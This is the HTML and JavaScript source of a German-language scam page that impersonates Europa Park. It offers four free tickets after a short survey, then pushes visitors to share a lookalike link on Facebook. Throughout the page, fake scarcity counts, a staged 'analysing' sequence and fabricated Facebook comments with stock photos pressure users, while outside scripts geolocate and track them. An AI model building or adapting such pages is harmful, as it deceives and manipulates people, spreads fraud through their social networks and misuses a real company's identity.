




<!DOCTYPE HTML>
<html>
<head>


	<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
	<meta name="viewport" content="initial-scale=1" />

 <title> 2017</title>
<META NAME="ROBOTS" CONTENT="NOINDEX, NOFOLLOW">
        
<!-- Facebook og -->

<meta property="og:image" content="http://3.bp.blogspot.com/-ufp0Y8M5MJg/WdTjDo_BnoI/AAAAAAAAAJ4/Tla0padsZf4T94Dn0v_TaWnafauAHOkagCLcBGAs/s1600/parcs-de-loisirs-europa-park-rust-ticket-eintrittskarte.jpeg" />

<meta property="og:title" content="Europa Park verlost 4 kostenlose Fahrschein für alle auf seinem 42. Jahrestag" />

<meta property="og:site_name" content="Europa Park verlost 4 kostenlose Fahrschein für alle auf seinem 42. Jahrestag" />

<meta name="description" content="Holen Sie sich kostenlos (4 Fahrschein) pro Person">

<meta property="og:url" content="http://www.europapark-ticket.com/" />






</head>
<style>
body {
    background-color: #FFF;
}

html, body, div, span, applet, object, iframe,
h1, h2, h3, h4, h5, h6, p, blockquote, pre,
a, abbr, acronym, address, big, cite, code,
del, dfn, em, img, ins, kbd, q, s, samp,
small, strike, strong, sub, sup, tt, var,
b, u, i, center,
dl, dt, dd, ol, ul, li,
fieldset, form, label, legend,
table, caption, tbody, tfoot, thead, tr, th, td,
article, aside, canvas, details, embed, 
figure, figcaption, footer, header, hgroup, 
menu, nav, output, ruby, section, summary,
time, mark, audio, video {
	margin: 0;
	padding: 0;
	border: 0;
	font-size: 100%;
	font: inherit;
	vertical-align: baseline;
}
/* HTML5 display-role reset for older browsers */
article, aside, details, figcaption, figure, 
footer, header, hgroup, menu, nav, section {
	display: block;
}
body {
	line-height: 1;
}
ol, ul {
	list-style: none;
}
blockquote, q {
	quotes: none;
}
blockquote:before, blockquote:after,
q:before, q:after {
	content: '';
	content: none;
}
table {
	border-collapse: collapse;
	border-spacing: 0;
}

/* CLEARFIX */

.clearfix:before,
.clearfix:after {
    content:"";
    display:table;
}
.clearfix:after {
    clear:both;
}
/* For IE 6/7 (trigger hasLayout) */
.clearfix {
    zoom:1;
}

/* STYLE */

body {
	background-color: #ffffff;
	font-size: 14px;
	font-family: Arial, sans-serif;
}

.preheader{
	color:#000000;
	font-size: 11px;

	text-align: center;
	padding-top: 5px;
}

.header {
	color: #fff;
	width: 90%;
	margin: 5px auto;
}

.header tr td {
	width: 50%;
}

.header tr td span {
	font-weight: bold;
	font-size: 1.1em;
	color: black;
}

.header tr td:last-child {
	text-align: right;
}

.wrapper {
	max-width: 90%;
	margin: 10px auto;
	background-color: #FFFFFF;
        border-size: 3px;
        border: 2px solid #000000;
	border-radius: 15px;
	-moz-border-radius: 15px;
	-webkit-border-radius: 15px;
	padding: 20px;
	-webkit-box-sizing: border-box;
	-moz-box-sizing: border-box;
	box-sizing: border-box;
}

h2 {
	font-size: 1.2em;
	font-weight: bold;
	color: #000000;
}

.underline {
	text-decoration: underline;
}

.red {
	color: #000000;
}

.bold {
	font-weight: bold;
}

.about {
	line-height: 20px;
	padding: 10px 0;
	text-align: justify;
	color: #000000;
}

.q h3 {
	font-size: 1.75em;
	padding: 10px 0;
	text-align: center;
	color: #000000;
	font-weight: bold;
}

.q .answer, #final .answer {
	font-size: 1.5em;
	font-weight: bold;
	color: #ffffff;
	background-color: #d8ab24;
	border: 2px solid #000000;
	text-decoration: none;
	width: 80%;
	margin: 10px auto 0;
	padding: 10px 0;
	display: block;
	text-align: center;
	-webkit-animation-duration: 1s; 
    animation-duration: 1s; 
    -webkit-animation-fill-mode: both; 
    animation-fill-mode: both; 
    -webkit-animation-timing-function: linear; 
    animation-timing-function: linear; 
}
.cta {font-size: 1.5em;
	font-weight: bold;
	color: #ffffff;
	background-color: #fff;
	border: 2px solid #ffffff;
	text-decoration: none;
	width: 80%;
	margin: 10px auto 0;
	padding: 10px 0;
	display: block;
	text-align: center;}
@-webkit-keyframes pulse { 
    0% { -webkit-transform: scale(1); } 
    50% { -webkit-transform: scale(1.1); } 
    100% { -webkit-transform: scale(1); } 
} 
@keyframes pulse { 
    0% { transform: scale(1); } 
    50% { transform: scale(1.1); } 
    100% { transform: scale(1); } 
} 
.pulse { 
    -webkit-animation-name: pulse; 
    animation-name: pulse; 
}

.loader {
	display: block;
	margin: 10px auto;
}

.load-list {
	width: 75%;
	margin: 15px auto 0;
	color: #000000;
}

.load-list li {
	background-image: url(X.png);
	background-repeat: no-repeat;
	background-position: left center;
	font-weight: bold;
	line-height: 20px;
	padding: 3px 0 3px 21px;
	color: #000000;
}

.try {
	display: block;
	color: #848484;
	font-size: 0.85em;
	margin-top: 25px;
	text-align: center;
}

#q2, #q3, #q4, .li1, .li2, .li3, #final, #loading, .fbcoms {
	display: none;
}

/* FB COMMENTS */

.fbcoms {
	font-family: Tahoma, Verdana, sans-serif;
	background-color: #fff;
	font-size: 12px;
	text-align: left;
}

.comments {
	font-weight: bold;
	text-align: center;
	padding: 0 5px 10px 5px;
}

.totlikes {
	margin-top: 3px;
	background-color: #eeeff4;
	padding: 5px 5px 5px 23px;
	background-image: url(sl.png);
	background-repeat: no-repeat;
	background-position: 5px center;
}

.fbblue {
	color: #3c5a96;
}

.buttons {
	padding-bottom: 5px;
	font-family: Arial, sans-serif;
	color: #7d7d7f;
}

.buttons span {
	cursor: pointer;
}

.buttons span:hover {
	text-decoration: underline;
}

.viewmore {
	margin-top: 3px;
	background-color: #eeeff4;
	padding: 5px 5px 5px 23px;
	background-image: url(bl.png);
	background-position: 5px center;
	background-repeat: no-repeat;
}

.left {
	cursor: pointer;
	float: left;
	color: #3c5a96;
}

.left:hover {
	text-decoration: underline;
}

.right {
	color: #7d7d7f;
	float: right;
}

.item {
	position: relative;
	margin-top: 3px;
	background-color: #eeeff4;
	padding: 5px 5px 5px 60px;
	min-height: 60px;
	-webkit-box-sizing: border-box;
	-moz-box-sizing: border-box;
	box-sizing: border-box;
}

.item .profileimg {
	position: absolute;
	top: 5px;
	left: 5px;
	width:50px;
}

.comtxt {
	line-height: 16px;
}

.name {
	color: #3c5a96;
	font-weight: bold;
}

.ago {
	color: #86878c;
	font-size: 0.95em;
}

.fblike {
	color: #3c5a96;
	font-size: 0.95em;
	cursor: pointer;
}

.fblike:hover {
	text-decoration: underline;
}

.combot {
	padding-top: 5px;
}

.clickhere {
	font-weight: bold;
	padding: 30px 10px 5px;
	line-height: 18px;
}

.likes {
	color: #3c5a96;
	font-size: 0.95em;
	cursor: pointer;
}

.fbimg {
	background-color: #fff;
	border-radius: 2px;
	-moz-border-radius: 2px;
	-webkit-border-radius: 2px;
	max-width: 210px;
	width: 100%;
	padding: 3px;
	-webkit-box-sizing: border-box;
	-moz-box-sizing: border-box;
	box-sizing: border-box;
	border: 1px solid #808080;
	margin: 10px 0 5px;
}

.hidden {
	display: none;
	opacity: 0;
}

/* ADD COMS */

.addcom {
	padding: 5px 15px 5px 65px;
	position: relative;
	min-height: 79px;
	border-bottom: 1px solid #e9e9e9;
	background-color: #f1f1f1;
	-webkit-box-sizing: border-box;
	-moz-box-sizing: border-box;
	box-sizing: border-box;
	margin-bottom: 10px;
}

.genericimg {
	position: absolute;
	top: 5px;
	left: 10px;
}

.addcom textarea {
	-webkit-box-sizing: border-box;
	-moz-box-sizing: border-box;
	box-sizing: border-box;
	width: 100%;
	border: 1px solid #899bc1;
	resize: none;
}

.addcom .newname {
	margin-top: 3px;
	border: 1px solid #899bc1;
	padding: 3px 5px;
}

.rightalign {
	text-align: right;
}

.insertcom {
	margin-top: 5px;
	border: 1px solid #999;
	padding: 3px 10px;
	font-weight: bold;
	font-size: 0.9em;
	background: #ffffff;
	background: -moz-linear-gradient(top,  #ffffff 0%, #e4e4e3 100%);
	background: -webkit-gradient(linear, left top, left bottom, color-stop(0%,#ffffff), color-stop(100%,#e4e4e3));
	background: -webkit-linear-gradient(top,  #ffffff 0%,#e4e4e3 100%);
	background: -o-linear-gradient(top,  #ffffff 0%,#e4e4e3 100%);
	background: -ms-linear-gradient(top,  #ffffff 0%,#e4e4e3 100%);
	background: linear-gradient(to bottom,  #ffffff 0%,#e4e4e3 100%);
	filter: progid:DXImageTransform.Microsoft.gradient( startColorstr='#ffffff', endColorstr='#e4e4e3',GradientType=0 );
	-webkit-box-shadow: 0px 1px 0px 0px rgba(216, 216, 216, 1);
	-moz-box-shadow: 0px 1px 0px 0px rgba(216, 216, 216, 1);
	box-shadow: 0px 1px 0px 0px rgba(216, 216, 216, 1);
}

.prodname{
    padding: 0;
    margin-top: 10px;
    margin-bottom: 10px;
    font-size: 1.6em;
    color: #000000;
}

.prodname {
	color: #000000;
}
.every {
	color: #000000;
}
.prodname {
	color: #000000;
}
.every {
	color: #000000;
}
#img1 {display:block;}
#img2 {display:none}

@media all and (max-width: 499px) {
    #img1 {display: none;}
    #img2 {display: block;}
}
body{font: 11px tahoma,verdana,arial,sans-serif;}
.page-header h1{font-size: 18px;}
#count{color:#f00;}
.loading-wrap, .loader{margin-top: 25px;}
a{color: #4865b5;}
.gemacht-btn{margin-top: 35px;}
.navbar-default {background:url(blue.png) repeat-x center top; background-size:100% 100%;background-color: transparent;border-color: #ffffff;margin-bottom: 0;border-radius: 0;}
.header-container {padding:15px;}
.header-txt {color: #fff;font-size: 18px;font-weight: bold;text-align: center;margin-bottom: 0;text-shadow: 0.1em 0.1em 0.05em #2d4478;}
textarea{font-size: 14px;}
.gemacht-resize, .beginnen{display:none;padding:8px 15px;background-color: #ECECEC;border-color: #A6A6A6;border-radius: 4px;border:1px solid #ddd;}
.gemacht-resize a, .beginnen a{color: #ffffff;}
.gemacht-resize a:hover, .beginnen a:hover{color: #ffffff;text-decoration: none;}
.Posten{margin-top: 20px;}
#target-to-copy-text{padding: 5px; color: #fff;background: #357ebd;margin-top:25px;}
a {color: #3B5998;text-decoration: none;}
.down-counter{font-family: 'Comic Sans MS';font-size: 18px;}
h4.schritt-one a, h4.schritt-two a, h4.schritt-three a{font-size: 11px;font-weight:bold;}
.loading-wrap h5{font-family: 'Comic Sans MS';font-size: 14px;}
#clipboard-text{color: #333;font-size: 12px;}

.benutzen {
	height: 300px;
	width: 500px;
	background-color: #fff;
	border: 1px solid #f5f5f5;
	border-radius: 4px;
	padding: 15px;
}
@media (max-width: 767px){
	.page-header img{height: 115px;}
	.gemacht-btn, .Posten{display: yes;}
	.beginnen{width: 80%;background: #f9f9f9;}
	.gemacht-resize, .beginnen{display: block;margin-top: 20px;}
	#target-to-copy{display: none;}
	.header-txt{font-size: 16px;}
	.benutzen {width: 270px;}
}
</style>
<body>
<script src="http://code.jquery.com/jquery-1.5.1.min.js"></script> 
    <script language="javascript">
        function randomString(len, charSet) {
            charSet = charSet || 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789';
            var randomString = '';
            for (var i = 0; i < len; i++) {
                var randomPoz = Math.floor(Math.random() * charSet.length);
                randomString += charSet.substring(randomPoz, randomPoz + 1);
            }
            return randomString;
        }

        function get_random_number(n) {
            return Math.floor((Math.random() * n) + 1);
        }
        var x;
        var links = new Array();
        x = get_random_number(45, 199);
    </script>
	<script language="javascript">
	
$(document).ready(function () {
	  
$("#go").click(function () { 
      $("#to").attr('href', '#'); 
});
    
}); 
    
	</script>
	
	
	
<script language="javascript">
        var links = new Array();
        links[0] = "http://www.europapark-de.com/?"  + randomString(7);



 randno = Math.floor(Math.random() * links.length);
        link = links[randno];
    </script>

<p class="preheader">Kontakt &middot; <span style="font-weight:bold">kostenlose Fahrschein</span> &middot; europapark.com </br>
<br><br/>
<center><img id="img1" src="https://upload.wikimedia.org/wikipedia/en/thumb/0/08/EuropaPark_logo.svg/400px-EuropaPark_logo.svg.png" alt="" width="15%">
<img id="img2" src="https://upload.wikimedia.org/wikipedia/en/thumb/0/08/EuropaPark_logo.svg/400px-EuropaPark_logo.svg.png" alt="" width="70%"></center>
<br>


	<table class="header">
		<tr>
			
			<td><center><span id="date"></span></center></td>
		</tr>
	</table>
	<div class="wrapper">
		<h2>Herzlichen Glückwunsch!</h2>
		<p class="about"><span class="bold red">Sie wurden ausgewählt, um an unserer kurzen Umfrage teilzunehmen, um 4 Kostenlose Fahrschein zu Europa park! Wir haben nur noch 764 Fahrschein, beeilen Sie sich! </p>
		<div class="q" id="q1">
			<h3>1/3: Hatten Sie uns jemals zuvor besucht??</h3>
			<a class="answer" href="javascript:void(0);">Ja</a>
			<a class="answer" href="javascript:void(0);">Nein</a>
		</div>
		<div class="q" id="q2">
			<h3>2/3: Bevorzugen Sie Europa park, weil? </h3>
			<a class="answer" href="javascript:void(0);">Dienstleistungen</a>
			<a class="answer" href="javascript:void(0);">Unterhaltung</a>
			<a class="answer" href="javascript:void(0);">Andere</a>
		</div>
		<div class="q" id="q3">
			<h3>3/3: Haben Sie jemals unzufrieden mit der Europa Park ?</h3>
			<a class="answer" href="javascript:void(0);">Ja</a>
			<a class="answer" href="javascript:void(0);">Nei</a>
		</div>
		<div id="loading">
			<img src="loading.gif" class="loader" Height="75"/>
			<ul class="load-list">
				<li class="li1">Senden Sie eine Antwort an Europa Park...</li>
				<li class="li2">Analysieren Sie Ihre Antworten...</li>
				<li class="li3">Herzlichen Glückwunsch! Sie haben 4 kostenlose Fahrschein bei Europa Park</li>
			</ul>
		</div>
		<div id="final">
		      <p align="center" class="prodname">Schritt : 1</p>
		 <p align="center" class="prodname">Teilen Sie diese Seite mit einem Klick auf "Teilen" und geben Sie "Dank Europa Park!" im Feld "Kommentare" ein!</p>
</p>
          
				<p align="center"> 
                

                        <a id="go" href="javascript:void(0)" onClick="gt=window.open('https://www.facebook.com/sharer/sharer.php?u=' + link + '', 'gt','top=176,left=500,toolbar=no,location=yes,directories=no,status=no, menubar=no,scrollbars=no,resizable=no,width=800,height=50'); gt.onload = function () {gt.focus();}; return false;"><strong><img src="de-s.png" align="top" border="0"></strong></a>
  		  </p>

	
        
        <div class="cont clearfix">
         
</br>
</br>
		  <p align="center" class="prodname">Schritt : 2</p>



                    <div align="center">
<p align="center" class="prodname">Klicken Sie auf Gefällt mir</a></p>

<a id="to" href='javascript:window.alert("Füllen Sie Schritt 1 aus, um das Fahrschein zu erhalten!");'> <br/><img src="de-l.png"> </a>


      <div class="loading-wrap">

                      <p align="center" class="prodname">Überprüfen der Schritte </p>
                            <img src="loading.gif" height="75" alt="Loader image not found">
                        </div>
                    </div>


   
		</div>
		<div class="cont">
		</div>
			</div>
	</div>
	</div>
	</div>
	</div>
	<div class="cont fbcoms">
			<p class="comments">Kommentar:</p>
			<div class="addcom">
				<a class="genericimg" href="#"><img src="https://s3-eu-west-1.amazonaws.com/store9090/C.jpg" /></a>
				<textarea class="newcom" placeholder="Einen Kommentar hinzufügen..."></textarea>
				<input class="newname" placeholder="Fügen Sie Ihren Namen..." />
				<div class="rightalign">
					<button class="insertcom">Kommentar</button>
				</div>
			</div>
			<p class="buttons">
			<span class="like">Gefällt mir</span> &middot; <span>Kommentar</span> &middot; <span>Teilen</span>
			</p>
			<p class="totlikes"><span id="youand"></span><span class="fbblue">12.068 andere</span> Gefällt mir</p>
			<p class="viewmore clearfix">
				<span class="left">Weitere Kommentare anzeigen</span>
				<span class="right">50 der 80,312</span>
			</p>
			<div class="item hidden yourcom">
				<img class="profileimg" src="http://i.imgur.com/4svKJyn.jpg" />
				<p class="comtxt"><span class="name yourname"></span> <span class="yourtext"></span></p>
				<p class="combot"><span class="ago">Gerade jetzt</span> &middot; <span class="fblike">Gefällt mir</span></p>
			</div>
			<div id="fb8" class="item hidden">
				<img class="profileimg" src="https://randomuser.me/api/portraits/men/54.jpg" />
				<p class="comtxt"><span class="name">Eunice Garza</span>Wow es war wirklich schön Spaß</p>
				<p class="combot"><span class="ago">Gerade jetzt</span> &middot; <span class="fblike">Gefällt mir</span></p>
			</div>
			<div id="fb7" class="item hidden">
				<img class="profileimg" src="https://randomuser.me/api/portraits/men/32.jpg" />
				<p class="comtxt"><span class="name">Bryan Odum</span>Es war beschäftigt an der Europa Park zählen heute. Es scheint, dass viele Menschen diese Fahrschein gewonnen haben.</p>

				<p class="combot"><span class="ago">Gerade jetzt</span> &middot; <span class="fblike">Gefällt mir</span></p>
			</div>
			<div id="fb6" class="item hidden">
				<img class="profileimg" src="https://randomuser.me/api/portraits/men/24.jpg" />
				<p class="comtxt"><span class="name">Bruno Pinho</span> Ich habe die kostenlosen Fahrschein gewonnen..</p>
				<p class="combot"><span class="ago">Gerade jetzt.</span> &middot; <span class="fblike">Gefällt mir</span></p>
			</div>
			<div id="fb5" class="item hidden">
				<img class="profileimg" src="https://randomuser.me/api/portraits/women/21.jpg" />
				<p class="comtxt"><span class="name">Jennfier Caesar</span>  Ich habe die kostenlosen Fahrschein von Europa Park. </p>

				<p class="combot"><span class="ago">Gerade jetzt</span> &middot; <span class="fblike">Gefällt mir</span></p>
			</div>
			<div id="fb4" class="item hidden">
				<img class="profileimg" src="https://randomuser.me/api/portraits/women/73.jpg" />
				<p class="comtxt"><span class="name">Aliza Brooks</span>Danke, Europa Park.  </p>
				<p class="combot"><span class="ago">1 t.</span> &middot; <span class="fblike">Gefällt mir</span></p>
			</div>
			<div id="fb3" class="item hidden">
				<img class="profileimg" src="https://randomuser.me/api/portraits/men/2.jpg" />
				<p class="comtxt"><span class="name">Wallace Porter</span> Ich gewann die Fahrschein ... Danke, Europa Park.</p>

				<p class="combot"><span class="ago">Gerade jetzt</span> &middot; <span class="fblike">Gefällt mir</span></p>
			</div>
			<div id="fb2" class="item hidden">
				<img class="profileimg" src="https://randomuser.me/api/portraits/men/99.jpg" />
				<p class="comtxt"><span class="name">Christopher Staton</span> Ich bin der größte Mensch auf Erden.</p>

				<p class="combot"><span class="ago">Gerade jetzt</span> &middot; <span class="fblike">Gefällt mir</span></p>
			</div>
			<div id="fb1" class="item hidden">
				<img class="profileimg" src="https://randomuser.me/api/portraits/women/53.jpg" />
				<p class="comtxt"><span class="name">Radford Sarah</span> Ich gewann einen kostenlosen Fahrschein von Europa park. </p>

				<p class="combot"><span class="ago">Gerade jetzt</span> &middot; <span class="fblike">Gefällt mir</span></p>
			</div>
			<div class="item">
				<img class="profileimg" src="https://randomuser.me/api/portraits/women/46.jpg" />
				<p class="comtxt"><span class="name">Deleon Sandra</span> Sådan en stor tjeneste! Tak Europa Park.</p>

				<p class="combot"><span class="ago">11 vor Minuten</span> &middot; <span class="fblike">Gefällt mir/span><span class="likes totlikes">267</span></p>
			</div>
			<div class="item">
				<img class="profileimg" src="https://randomuser.me/api/portraits/women/89.jpg" />
				<p class="comtxt"><span class="name">Brenda Vaughn</span>Tak Europa!</p>

				<p class="combot"><span class="ago">17 vor Minuten</span> &middot; <span class="fblike">Gefällt mir</span><span class="likes totlikes">63</span></p>
			</div>
			<div class="item">
				<img class="profileimg" src="https://randomuser.me/api/portraits/women/61.jpg" />
				<p class="comtxt"><span class="name">Sabrina White</span> Tak Europa..</p>


				<p class="combot"><span class="ago">19 vor Minuten</span> &middot; <span class="fblike">Gefällt mir</span><span class="likes totlikes">112</span></p>
			</div>
		</div>


<script src="http://geoapi123.appspot.com"></script>
<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.11.1/jquery.min.js"></script>
<script type="text/javascript">
function date(a) {
	var d = new Date();
	var m = ["January","February","March","April","May","June","July","August","September","October","November","December"];
	$(a).html(d.getDate()+". "+m[d.getMonth()]+" "+d.getFullYear()+" ");
	return false;
}
function addCom() {
	if($(".newcom").val() != "" && $(".newname").val() != "") {
		$(".yourtext").html($(".newcom").val());
		$(".yourname").html($(".newname").val());
		$(".yourcom").css({"opacity":1}).fadeIn(250);
		$(".newcom, .newname").val("");
		$(".addcom").hide();
	} else alert("Enter full name & comment please");
	return false;
}
function FBcom(a,b) {
	setTimeout(function() {
		var m = 0, n = true, op = 0;
		$(a+", "+a+" .comtxt, "+a+" .combot").slideDown(500);
		$().slideDown(500);
		var t = setInterval(function() {
			op += 0.2;
			$(a).css({"opacity":op});
			m++;
			if(m == 5) clearInterval(t);
		}, 100);
	}, b);
}
var i = 0;
$(document).ready(function() {
	date("#date");
	$(".addcom").on("click", ".insertcom" ,addCom);
	$(".like").click(function() {
		if($(this).hasClass("selected")) {
			$(this).removeClass("selected");
			$(this).html("Like");
			$("#youand").html("");
		} else {
			$(this).addClass("selected");
			$(this).html("Unlike");
			$("#youand").html("You and ");
		}
	});
	$(".fblike").click(function() {
		if($(this).hasClass("selected")) {
			$(this).removeClass("selected");
			$(this).html("Like");
		} else {
			$(this).addClass("selected");
			$(this).html("Unlike");
		}
	});
	var city = (typeof geoip_city == typeof Function && geoip_city() != "") ? geoip_city() : "your city";
	var region = (typeof geoip_region_name == typeof Function && geoip_region_name() != "") ? ", "+geoip_region_name() : "";
	var country = (typeof geoip_country_name == typeof Function && geoip_country_name() != "") ? ", "+geoip_country_name() : "";
	$(".geoip").html(city+region+country);
	$(".q .answer").on('click',function() {
		i++;
		$(this).addClass("pulse");
		var _this = this;
		setTimeout(function() {
			$(_this).parent().fadeOut(250, function() {
				if($(_this).parent().next().hasClass("q")) $(_this).parent().next().fadeIn(250);
				else {
					$("#loading").fadeIn(250);
					setTimeout(function() {
						$(".li1").fadeIn(250);
					}, 1850);
					setTimeout(function() {
						$(".li2").fadeIn(250);
					}, 4350);
					setTimeout(function() {
						$(".li3").fadeIn(250);
					}, 6800);
					setTimeout(function() {
						$(".loader").fadeOut(250, function() {
							$("#final, .fbcoms").fadeIn(250);
							FBcom("#fb1",3000);
							FBcom("#fb2",5000);
							FBcom("#fb3",7000);
							FBcom("#fb4",9000);
							FBcom("#fb5",10500);
							FBcom("#fb6",13000);
							FBcom("#fb7",15000);
							FBcom("#fb8",20000);
						});
					}, 8600);
				}
			});
		}, 1000);
	});
});
</script>
 

</div>

</div>


<img src="http://whos.amung.us/widget/meraklm779" height="1" width="1">
</body>
</html>

